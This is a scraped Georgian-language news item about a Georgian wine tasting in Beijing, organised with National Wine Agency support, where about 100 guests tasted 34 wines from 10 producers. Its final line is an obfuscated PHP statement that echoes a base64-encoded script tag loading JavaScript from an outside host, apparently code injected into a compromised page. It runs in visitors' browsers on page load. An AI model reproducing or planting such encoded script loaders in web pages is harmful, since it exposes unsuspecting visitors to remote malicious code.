celsiusi
ავერსი შნაიდერი
ღვინის ეროვნული სააგენტოს მხარდაჭერითა და სააგენტოს კონტრაქტორი კომპანიის „Georgian Wine Promotion House“ ორგანიზებით, ჩინეთის დედაქალაქ პეკინში ქართული ღვინის დეგუსტაცია გაიმართა.
 
როგორც "ბიზნესთაიმს" ღვინის ეროვნული სააგენტოდან აცნობეს, ქართული ღვინის ერთ-ერთ სტრატეგიულ ბაზარზე, ჩინეთში, პანდემიის დაწყებიდან დღემდე, აღნიშნული ღონისძიება ერთ-ერთი ყველაზე მასშტაბური იყო და მას ღვინის პროფესიონალები, დიპლომატები, ღვინით ვაჭრობის სფეროს, მედიისა  და ადგილობრივი ხელისუფლების წარმომადგენლები, ჯამში, 100-მდე სტუმარი დაესწრო.
 
 
დეგუსტაციის მონაწილეებს შესაძლებლობა მიეცათ, ქართული ღვინის მწარმოებელი 10 კომპანიის 34 სხვადასხვა ღვინო დაეგემოვნებინათ.  აღნიშნული ღვინის ნიმუშები  ჩინეთის 15 სხვადასხვა ქალაქში წარმოდგენილი ქართული ღვინის იმპორტიორების მიერ შეირჩა. 
 
ღონისძიების ორგანიზატორების ინფორმაციით, იქიდან გამომდინარე, რომ ჩინეთში სულ უფრო და უფრო პოპულარული ხდება ქარვისფერი ღვინოები, დეგუსტაციაზე წარმოდგენელმა ქვევრის ღვინოებმა სტუმრების განსაკუთრებული მოწონება დაიმსახურა.
 
 
1370
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");